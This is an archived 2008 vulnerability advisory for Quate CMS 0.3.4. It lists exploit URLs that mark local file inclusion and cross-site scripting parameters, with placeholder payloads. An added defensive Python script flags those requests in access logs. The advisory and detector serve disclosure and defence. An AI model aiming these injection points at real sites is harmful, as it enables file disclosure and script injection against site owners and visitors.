Quate CMS 0.3.4 footer.php/header.php (LFI/XSS) Multiple Remote Vulnerabilities

2008-08-07T00:00:00
ID SSV:9255
Type seebug
Reporter Root
Modified 2008-08-07T00:00:00

Description

No description provided by source.

                                        
                                            
┌┌───────────────────────────────────────────────────────────────────────────┐
││                             C r a C k E r                                ┌┘
┌┘          T H E   C R A C K   O F   E T E R N A L   M I G H T             ││
└───────────────────────────────────────────────────────────────────────────┘┘

 ┌────      From The Ashes and Dust Rises An Unimaginable crack....      ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘               [ Local File Include ] [ XSS ]                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                : :                                    :
│   Group    : N/A                    │ │                                    │
│   Script   : Quate CMS 0.3.4        │ │         Register Globals :         │
│   Download : quate.net              │ │                                    │
│   Method   : GET                    │ │          [█] ON   [ ] OFF          │
│   Critical : High [░░▒▒▓▓██]        │ │                                    │
│   Impact   : System access          │ │                                    │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│                              DALnet #crackers                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:                                                                            :
│  Release Notes:                                                            │
│  ═════════════                                                             │
│  Typically used for remotely exploitable vulnerabilities that can lead to  │
│  system compromise.                                                        │
│                                                                            │

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                             Exploit URLs                                 ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

[LFI]
  
http://localhost/path/admin/includes/footer.php?row_secure[account_theme]=[LFI]
http://localhost/path/admin/includes/footer.php?admin_template_default=[LFI]

[XSS]

http://localhost/path/admin/includes/themes/default/header.php?page_area=[XSS]
http://localhost/path/admin/includes/themes/default/header.php?page_header=[XSS]

   
└────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                              © CraCkEr 2008                              ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
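
Added example (not part of the original advisory and not Quate CMS code): the four URLs above request include fragments directly, so a defender can flag any access-log request that reaches those scripts with the listed parameters, whatever the value. The log lines are constructed samples in combined log format, and PLACEHOLDER stands in for the parameter value.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path suffix -> (issue class, parameter names), both taken from the advisory.
WATCHED = {
    "/admin/includes/footer.php":
        ("LFI", {"row_secure[account_theme]", "admin_template_default"}),
    "/admin/includes/themes/default/header.php":
        ("XSS", {"page_area", "page_header"}),
}

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; PLACEHOLDER stands in for the parameter value.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Aug/2008:10:00:01 +0000] "GET /cms/admin/includes/footer.php?admin_template_default=PLACEHOLDER HTTP/1.1" 200 512',
    '203.0.113.5 - - [07/Aug/2008:10:00:02 +0000] "GET /cms/admin/includes/footer.php?row_secure%5Baccount_theme%5D=PLACEHOLDER HTTP/1.1" 200 512',
    '203.0.113.5 - - [07/Aug/2008:10:00:03 +0000] "GET /cms/admin/includes/themes/default/header.php?page_area=PLACEHOLDER HTTP/1.1" 200 300',
    '198.51.100.7 - - [07/Aug/2008:10:00:04 +0000] "GET /cms/index.php?page=home HTTP/1.1" 200 4096',
]

def classify(log_line):
    """Return [(issue, parameter, value)] for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    path = unquote(url.path).lower()
    hits = []
    for suffix, (issue, params) in WATCHED.items():
        if path.endswith(suffix):
            # parse_qsl percent-decodes names, so %5B/%5D forms match too.
            for name, value in parse_qsl(url.query, keep_blank_values=True):
                if name in params:
                    hits.append((issue, name, value))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every line with at least one hit."""
    results = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            results.append((n, hits))
    return results

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, hits)
```

With register_globals on, the same variables can also arrive in a POST body or cookie, which a standard access log does not record, so this check covers only the GET method the advisory lists.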